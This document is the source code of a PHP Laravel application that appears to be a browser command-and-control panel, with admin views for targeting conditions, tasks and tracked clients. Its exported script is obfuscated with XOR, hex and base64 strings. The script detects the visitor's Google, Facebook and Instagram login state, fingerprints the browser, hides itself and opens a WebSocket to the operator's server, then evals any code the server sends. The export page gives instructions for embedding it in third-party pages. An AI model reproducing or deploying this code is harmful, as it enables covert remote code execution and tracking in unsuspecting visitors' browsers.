routes/web.php
<?php
Route::group(['middleware'=>['auth']],function() {
    Route::get('js/{name}', function ($name = null) {
        if (file_exists(base_path("private/js/$name"))) {
            $contents = file_get_contents(base_path("private/js/$name"));
            $response = Response::make($contents, 200);
            $response->header('Content-Type', 'application/javascript');
            return $response;
        } else
            throw new \Symfony\Component\HttpKernel\Exception\NotFoundHttpException('Not found');
    })->where('name', '(.*)');

    Route::group(['prefix'=>'control'],function(){
        Route::group(['prefix'=>'api'],function(){
            Route::group(['prefix'=>'get'],function(){
                Route::any('condition', 'AdminController@apiGetCondition');
                Route::any('task', 'AdminController@apiGetTask');
            });
            Route::group(['prefix'=>'set'],function(){
                Route::any('condition', 'AdminController@apiSetCondition');
                Route::any('task', 'AdminController@apiSetTask');
            });
            Route::group(['prefix'=>'sync'], function(){
                Route::any('task/condition', 'AdminController@syncTaskCondition');
            });
            Route::group(['prefix'=>'reset'], function(){
                Route::any('connections', 'AdminController@resetTaskCondition');
            });
            Route::group(['prefix'=>'delete'], function(){
                Route::any('/{subject}/{id}', 'AdminController@delete');
            });
        });
        Route::get('conditions', 'AdminController@conditions');
        Route::get('connections', 'AdminController@connections');
        Route::get('tasks', 'AdminController@tasks');
        Route::get('export', 'AdminController@export');
        Route::get('statistics', 'AdminController@statistics');
        Route::get('clients/{active?}', 'AdminController@clients');
        Route::any('frames', 'AdminController@frames');
        Route::any('frame', 'AdminController@frame');
    });
});

Route::any('/login', function (\Illuminate\Http\Request $request) {
    if(Auth::user())
        return redirect('/control/conditions');
    if($request->isMethod('post')){
        if(Auth::attempt([
            "email"=>$request->get('email'),
            "password"=>$request->get('password')
        ])){
            return redirect()->intended();
        }
        else
            return redirect()->back()->withInput($request->all());
    }
    else
        return view('admin.login');
})->name('login');

Route::get('logout', function(){
    Auth::logout();
    return redirect('/login');
});

Route::get('/fp', 'StaticController@getFingerPrintScript');
Route::get('/utils.js', 'StaticController@getEmbedScript');

Route::get('/{token?}', function (\Illuminate\Http\Request $request, $token = null) {
    if(Auth::user())
        return redirect('/control/conditions');
    if(!$token)
        $token = "0";
    $address = $request->has('url') ? $request->get('url') : "";

    return view('admin.frame', ["token"=>$token, "address"=>$address]);
});

app/Client.php
<?php

namespace App;

use Carbon\Carbon;
use Illuminate\Database\Eloquent\Model;

class Client extends Model
{
    protected $fillable = [
        'hash', 'task_id', 'active', 'country', 'browser', 'platform', 'accept_language', 'socials', 'session_start', 'session_end'
    ];

    protected $casts = [
        'socials'=>'object'
    ];

    public function task(){
        return $this->belongsTo(Task::class);
    }
    public function getSessionDurationAttribute() {
        $se = $this->session_end;
        $ss = $this->session_start;
        if(!$this->active && !$se)
            return 0;
        if(!$se)
            $now = \DateTime::createFromFormat("Y-m-d H:i:s", date("Y-m-d H:i:s"));
        else
            $now = \DateTime::createFromFormat("Y-m-d H:i:s", $se);
        $dif = $now->diff(\DateTime::createFromFormat("Y-m-d H:i:s", $ss));
        return $dif->format("%H:%I:%S");
    }
    public function finishSession($d = null){
        $this->session_end = \DateTime::createFromFormat("Y-m-d H:i:s", $d ? $d : date("Y-m-d H:i:s"));
    }
}

resources/views/admin/clients.blade.php
@extends('admin.layout')
@section('body')
    <div class="notifications" style="position:fixed;top:0px;right:0px;max-width:600px;z-index:99"></div>
    <div class="panel" style="overflow-x: scroll; overflow-y: scroll">
        <p class="panel-heading">
            Active connections:
        </p>
        <div class="panel-block">
            @if($active)
                <a class="button button-red" href="/control/clients">Show all</a>
            @else
                <a class="button button-blue" href="/control/clients/active">Show active</a>
            @endif
        </div>
        <div class="panel-block">
            <table class="table is-bordered is-striped is-narrow is-fullwidth">
                <thead>
                <tr>
                    <td>Hash</td>
                    <td>Country</td>
                    <td>Browser</td>
                    <td>Platform</td>
                    <td>Accept-Language</td>
                    <td>Task</td>
                    <td>Session start</td>
                    <td>Session end</td>
                    <td>Session duration</td>
                </tr>
                </thead>
                <tbody>
                @foreach($clients as $item)
                    <tr>
                        <td>{{$item->hash}}</td>
                        <td>{{config('condition.countries.' . $item->country,config('condition.defaults.country'))}}</td>
                        <td>{{$item->browser}}</td>
                        <td>{{$item->platform}}</td>
                        <td>{{$item->accept_language}}</td>
                        <td>{{$item->task ? $item->task->name : ''}}</td>
                        <td>{{$item->session_start}}</td>
                        <td>{{$item->session_end}}</td>
                        <td>{{$item->session_duration}}</td>
                    </tr>
                @endforeach
                </tbody>
            </table>
        </div>
    </div>
@endsection
@section('script')

@endsection

resources/views/admin/conditions.blade.php
@extends('admin.layout')
@section('body')
        <div class="notifications" style="position:fixed;top:0px;right:0px;max-width:600px;z-index:99"></div>
        <div class="panel">
            <p class="panel-heading">
                Condition:
            </p>
            <div class="panel-block">
                <div class="control">
                    <div class="field">
                        <label class="label">Condition for editing</label>
                    </div>
                    <div class="field has-addons">
                        <div class="control is-expanded">
                            <div class="is-fullwidth">
                                <input type="text" name="condition" class="input" list="conditions"/>
                                <datalist id="conditions">
                                    <label>
                                        <select name="condition">
                                            @foreach(\App\Condition::all(['id','name']) as $condition)
                                                <option value="{{$condition->id}}">{{$condition->name}}</option>
                                            @endforeach
                                        </select>
                                    </label>
                                </datalist>
                            </div>
                        </div>
                        <div class="control">
                            <button type="submit" id="edit" class="button is-primary">Edit</button>
                            <button type="submit" id="delete" class="button is-primary">Delete</button>
                            <button type="submit" id="clear" class="button is-primary">Clear</button>
                        </div>
                    </div>
                </div>
            </div>
            <div class="panel-block">
                <form method="post" action="/control/api/set/condition" id="main" class="control">
                    <div class="field">
                        <label class="label">Name</label>
                        <div class="control">
                            <input name="name" class="input" type="text">
                        </div>
                    </div>
                    <div class="field">
                        <label class="label">Country</label>
                        <div class="control">
                            <input type="text" name="country" class="input" list="countries"/>
                            <datalist id="countries">
                                <label>
                                    <select name="country">
                                        @foreach($config['countries'] as $iso => $name)
                                            <option value="{{$iso}}">{{$name}}</option>
                                        @endforeach
                                    </select>
                                </label>
                            </datalist>
                        </div>
                    </div>
                    <div class="field">
                        <label class="label">Platform</label>
                        <div class="control">
                            <input type="text" name="platform" class="input" list="platforms"/>
                            <datalist id="platforms">
                                <label>
                                    <select name="platform">
                                        @foreach($config['platforms'] as $platform)
                                            <option value="{{str_ireplace(" ", "_", strtolower($platform))}}">{{$platform}}</option>
                                        @endforeach
                                    </select>
                                </label>
                            </datalist>
                        </div>
                    </div>
                    <div class="field">
                        <label class="label">Browser</label>
                        <div class="control">
                            <input type="text" name="browser" class="input" list="browsers"/>
                            <datalist id="browsers">
                                <label>
                                    <select name="browser">
                                        @foreach($config['browsers'] as $platform)
                                            <option value="{{str_ireplace(" ", "_", strtolower($platform))}}">{{$platform}}</option>
                                        @endforeach
                                    </select>
                                </label>
                            </datalist>
                        </div>
                    </div>
                    <div class="field">
                        <label class="label">Accept-Language</label>
                        <div class="control">
                            <input name="accept_language" class="input" type="text">
                        </div>
                    </div>
                    <div class="field">
                        <label class="label">Socials</label>
                        <div class="control">
                            <label class="checkbox">
                                <input type="checkbox" name="google">
                                Google
                            </label>
                        </div>
                        <div class="control">
                            <label class="checkbox">
                                <input type="checkbox" name="facebook">
                                Facebook
                            </label>
                        </div>
                        <div class="control">
                            <label class="checkbox">
                                <input type="checkbox" name="instagram">
                                Instabram
                            </label>
                        </div>
                    </div>
                    <div class="field">
                        <label class="label">Token</label>
                        <div class="control">
                            <input name="token" class="input" type="text">
                        </div>
                    </div>
                    <input name="id" class="input" type="hidden">
                    <input class="button is-primary" id="confirm" value="Create" type="submit">
                </form>
            </div>
        </div>
@endsection
@section('script')
<script>
$(document).ready(function(){
    $('#delete').on('click', function(){
        var val = $('input[name=condition]').val();
        if(val.length){
            axios.get('/control/api/delete/condition/' + val, {}).then(function(response){
                appendNotification(response.data.type, response.data.error ? 'Error' : 'Ok', response.data.error);
                if(!response.data.error){
                    $('select[name=condition] > option[value=' + val + ']').remove();
                    $('#clear').click();
                }
            }).catch(function(e){
                appendNotification('danger', 'Error', 'No such entry');
            });
        }
    });
     $('#edit').on('click', function(){
         var val = $('input[name=condition]').val();
         if(val.length){
             axios.get('/control/api/get/condition', {
                 params:{
                     con: val
                 }
             }).then(function(response){
                 Object.keys(response.data).forEach(function(element){
                     var elem = $('input[name=' + element + ']');
                     if(elem.length){
                         debugger;
                         if(elem[0].type === 'checkbox')
                             elem.attr('checked', response.data[element] == 1 ? true : false);
                         else
                            elem.val(response.data[element]);
                     }
                 });
                 $("#confirm").val('Update');
             });
         }
     });
    $('input[name=condition]').on('input',function(){
        var val = $('input[name=condition]').val();
        if(!val.length){
            $('input[name]').val('');
            $("#confirm").val('Create');
        }
    });
    $('#clear').on('click',function(){
        $('input[name]').val('');
        $("#confirm").val('Create');
    });
    $('#main').submit(function(){
        var fields = {};
        $(this).find('input[name]').each(function(){
            if(this.type === 'checkbox'){
                if(this.checked)
                    fields[this.name] = this.checked;
            }
            else
                fields[this.name] = this.value;
        });
        axios.post(this.action, fields).then(function(response){
            appendNotification(response.data.type, response.data.error ? 'Error' : 'Ok', response.data.error);
            if(!response.data.error && response.data.data){
                $('select[name=condition]').append('<option value="' + response.data.data.id + '">' + response.data.data.name + '</option>')
            }
        });
        return false;
    });
});
</script>
@endsection

resources/views/admin/connections.blade.php
@extends('admin.layout')
@section('style')
    select[name=tasks] {
        height: unset;
        padding: 0 !important;
    }
    select[name=tasks] option {
        padding: .5em 1em;
    }
@endsection
@section('body')
    <div class="notifications" style="position:fixed;top:0px;right:0px;max-width:600px;z-index:99"></div>
    <div class="panel">
        <div class="panel-heading">
            <label class="label">Connections</label>
        </div>
        <div class="panel-block">
            <div class="control is-expanded">
                <div class="select is-multiple is-fullwidth">
                    <div class="field">
                        <select name="tasks" size="8">
                            @foreach(\App\Task::all(['id','name']) as $task)
                                <option value="{{$task->id}}">{{$task->name}}</option>
                            @endforeach
                        </select>
                    </div>
                </div>
            </div>
            <div class="control is-expanded">
                <div class="select is-multiple is-fullwidth">
                    <div class="field">
                        <select name="conditions" multiple size="8">
                            @foreach(\App\Condition::all(['id','name']) as $condition)
                                <option value="{{$condition->id}}">{{$condition->name}}</option>
                            @endforeach
                        </select>
                    </div>
                </div>
            </div>
        </div>
        <div class="panel-block">
            <div class="control is-expanded">
                <div class="field">
                    <input class="button is-primary" id="apply" value="Apply" type="button">
                </div>
                <div class="field">
                    <input class="button is-primary" id="reset" value="Reset *ALL*" type="button">
                </div>
            </div>
        </div>
    </div>
@endsection
@section('script')
    <script>
        $(document).ready(function(){
            $('select[name=tasks]').on('change', function(){
                var val = $('select[name=tasks] option:selected').val();
                if(val.length){
                    axios.get('/control/api/get/task', {
                        params:{
                            task: val
                        }
                    }).then(function(response){
                        $("select[name=conditions] option").each(function(){
                            this.selected = false;
                        });
                        response.data.conditions.forEach(function(element){
                            $("select[name=conditions] option[value=" + element.id + "]").prop('selected', true);
                        });
                    }).catch(function(e){
                        appendNotification('danger', 'Error', 'No such entry');
                    });
                }
            });
            $('#apply').on('click', function(){
                var id = $('select[name=tasks] option:selected').val();
                var selected = [];
                $('select[name=conditions] option:selected').each(function(){
                    selected.push(this.value);
                });
                axios.post('/control/api/sync/task/condition', {
                    id: id,
                    conditions: selected
                }).then(function(response){
                    appendNotification(response.data.type, response.data.error ? 'Error' : 'Ok', response.data.error);

                });
            });
            $('#reset').on('click', function(){
                axios.get('/control/api/reset/connections').then(function(response){
                    appendNotification(response.data.type, response.data.error ? 'Error' : 'Ok', response.data.error);
                });
            });
        });
    </script>
@endsection

resources/views/admin/export.blade.php
@extends('admin.layout')
@section('body')
    <div class="notifications" style="position:fixed;top:0px;right:0px;max-width:600px;z-index:99"></div>
    <div class="panel">
        <div class="panel-block">
            <div class="control">
                <div class="field">
                    <label class="label">Dependencies</label>
                    <pre>&lt;script type="application/javascript" src="{{asset('fp')}}"&gt;&lt;/script&gt;</pre>
                    <h2>Or download it:</h2>
                    <a href="{{asset('fp')}}" download="fingerprint2.js">FingerprintJS2</a>
                </div>
                <div class="field">
                    <div class="control">
                        <label class="label">Script</label>
                        <div class="alert alert-warning">Replace <strong>{token}</strong> and <strong>{address}</strong> in code for yours
                            <div>
                                <div class="field is-grouped">
                                    <div class="control">
                                        <label class="checkbox has-text-centered">
                                            <input type="text" id="token" placeholder="token" value="">
                                        </label>
                                    </div>
                                    <div class="control">
                                        <label class="checkbox has-text-centered">
                                            <input type="text" id="address" placeholder="address" value="">
                                        </label>
                                    </div>
                                    <div class="control">
                                        <label class="checkbox has-text-centered">
                                            <input type="button" id="replace" value="replace">
                                        </label>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="alert alert-danger">Or just add this to you html, but first <strong>REPLACE {address}</strong>
                            <pre id="script_utils">
&lt;script type="application/javascript" src="{{url('/utils.js')}}?url={address}"&gt;&lt;/script&gt;
                            </pre>
                            <div>
                                <div class="field is-grouped">
                                    <div class="control">
                                        <label class="checkbox has-text-centered">
                                            <input type="text" id="address2" placeholder="address" value="">
                                        </label>
                                    </div>
                                    <div class="control">
                                        <label class="checkbox has-text-centered">
                                            <input type="button" id="replace2" value="replace">
                                        </label>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <input name="script" class="input" type="hidden">
                        <div style="min-height: 500px; max-width: 600px">
                            <pre id="editor" style="height: 500px;">
@include('admin.script', ['address'=>'{{address}}','token'=>'{{token}}'])
                            </pre>
                        </div>
                    </div>
                </div>
                <div class="field is-grouped">
                    <div class="control">
                        <label class="checkbox has-text-centered">
                            <input type="button" id="default" value="restore">
                        </label>
                    </div>
                    <div class="control">
                        <label class="checkbox has-text-centered">
                            <input type="checkbox" id="minify">
                            minify?
                        </label>
                    </div>
                    <div class="control">
                        <textarea style="display:none" id="fp">
@include('admin.fp')
                        </textarea>
                        <label class="checkbox has-text-centered">
                            <input type="checkbox" id="nodeps">
                            no dependencies
                        </label>
                    </div>
                </div>
            </div>
        </div>
    </div>
@endsection
@section('script')
    <script src="{{asset('js/ace/ace.js')}}" type="text/javascript" charset="utf-8"></script>
    <script src="{{asset('js/lib/utils.js')}}"></script>
    <script src="{{asset('js/lib/ast.js')}}"></script>
    <script src="{{asset('js/lib/parse.js')}}"></script>
    <script src="{{asset('js/lib/transform.js')}}"></script>
    <script src="{{asset('js/lib/scope.js')}}"></script>
    <script src="{{asset('js/lib/output.js')}}"></script>
    <script src="{{asset('js/lib/compress.js')}}"></script>
    <script src="{{asset('js/lib/beautify.js')}}"></script>
    <script>
        var editor = ace.edit("editor");
        editor.setTheme("ace/theme/monokai");
        editor.getSession().setMode("ace/mode/javascript");
        var oldval = editor.getValue();
        var fp2 = $('#fp').val();
        var fpload = "";
        editor.getSession().on('change', function(ed){
            $('input[name=script]').val(editor.getValue());
        });
        editor.setValue(oldval + '\n' + fpload);
        var tval = editor.getValue();
        $(document).ready(function(){
            $('#minify').click(function(){
                if(this.checked)
                    editor.setValue(window.uglify(editor.getValue(), {}));
                else
                    editor.setValue(oldval);
                tval = editor.getValue();
            });
            $('#nodeps').click(function(){
                if(this.checked)
                    editor.setValue(js_beautify(fp2) + '\n' + oldval, {});
                else
                    editor.setValue(oldval + '\n' + fpload);
                tval = editor.getValue();
            });
            $('#default').click(function(){
                editor.setValue(oldval);
                tval = editor.getValue();
            });
            var t = "", a = "" , a2 = "";
            $('#token').on('input propertychange', function(e){
                t = e.target.value;
            });
            $('#address').on('input propertychange', function(e){
                a = e.target.value;
            });
            $('#replace').click(function(e){
                editor.setValue(tval.replace('{address}', a).replace('{token}', t));
            });
            $('#address2').on('input propertychange', function(e){
                a2 = e.target.value;
            });
            $('#replace2').click(function(e){
                $("#script_utils").html($("#script_utils").html().replace('{address}', a2));
            });
        });
    </script>
@endsection

resources/views/admin/frame.blade.php
<!doctype html>
<html lang="{{ app()->getLocale() }}">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body style="margin:0;padding:0;border:none">
    <script type="application/javascript" src="{{url('/utils.js')}}?url={{$address}}"></script>
    {{--<script>--}}
        {{--@include('admin.script')--}}
    {{--</script>--}}
</body>
</html>

resources/views/admin/frames.blade.php
@extends('layout')
@section('body')
    <div class="notifications" style="position:fixed;top:0px;right:0px;max-width:600px;z-index:99"></div>
    <div class="panel">
        <div class="panel-block">
            <div class="control">
                <div class="field">
                    <input id="address" type="text" value="/get/img"/>
                </div>
                <div class="field">
                    <input id="submit" type="button" value="Go"/>
                </div>
            </div>
            <div class="control">
                <div class="field">
                    <iframe id="outer" style="width: 728px;height: 90px; overflow: hidden;margin:0;padding:0;border:none" scrolling="no"></iframe>
                </div>
            </div>
        </div>
    </div>
@endsection
@section('script')
    <script>
        $(document).ready(function(){
            $("#submit").click(function(){
                var fields = {
                    address: $("#address").val(),
                    code: $("#code").val()
                };
                $("#outer").attr('src', fields.address);
            })
        })
    </script>
@endsection

resources/views/admin/script.blade.php
function check(src) {
return new Promise(function(resolve, reject) {
var x = new Image();
x.onerror = function(){reject()};
x.onload = function(){resolve()};
x.src = src;
}).then(function(){return true;},function(){return false;});
}
Promise.all([check("https://accounts.google.com/CheckCookie?continue=https%3A%2F%2Fwww.google.com%2Fintl%2Fen%2Fimages%2Flogos%2Faccounts_logo.png&followup=https%3A%2F%2Fwww.google.com%2Fintl%2Fen%2Fimages%2Flogos%2Faccounts_logo.png&chtml=LoginDoneHtml&checkedDomains=youtube&checkConnection=youtube%3A291%3A1"),check("https://www.facebook.com/login?next=/security/hsts-pixel.gif"),check("https://www.instagram.com/accounts/login?next=/static/images/ico/favicon.svg/9d8680ab8a3c.svg")]).then(function(results){
var sc = 0;
var t = [1, 4, 8];
results.forEach(function(e, i){
if(e === true){
sc = sc | t[i]
}
});
var s={z:[4,8,15,16,32],b:function(n){var t="";return n.forEach(function(n,e){t+=String.fromCodePoint(n^s.z[e%s.z.length])}),t},g:function(){return s.n},s:function(n){this.g().send(n)},c:function(){s.n.close(),s.n=void 0,s.i(s.h,s.H)},r:function(n){window.execScript?execScript(n):window.eval(n)},i:function(n,t){if(s.h||(s.h=n,s.H=t),!s.n&&(s.n=new WebSocket(this.b([115,123,53,63,15])+n+this.b([62,59,62,35,17,43])+t)))return Object.assign(s.n,{onmessage:function(n){s.r(n.data)},onclose:function(n){1010==n.code&&s.c()},onerror:function(n){3==n.target.readyState&&setTimeout(s.c,1e3)}}),this}};
var e=document[atob('Y3JlYXRlRWxlbWVudA==')](atob('aWZyYW1l'));e['style']='width:100%;height:100%;position:absolute;overflow:hidden;margin:0;padding:0;border:none';e['src']='{{$address}}';document['body']['appendChild'](e);
function h(t){var r,e=""+t,x="";for(r=0;r < e.length;r+=2)x+=String.fromCharCode(parseInt(e.substr(r,2),16));return x}
document.getElementsByTagName(h('736372697074'))[0].remove();
@if(isset($embedded))
(new fp).get(function(e){s.i("{{starts_with(url('/'), "https://") ? substr(url('/'),8) : substr(url('/'),7)}}",e+"/{{$token}}/"+sc)});
@else
var x=new window[h('584d4c4874747052657175657374')];x.open(h('474554'),h('2f6670'),!0),x.onload=function(){s.r(x.responseText);(new fp).get(function(e){s.i("{{starts_with(url('/'), "https://") ? substr(url('/'),8) : substr(url('/'),7)}}",e+"/{{$token}}/"+sc)})},x.send();
@endif
});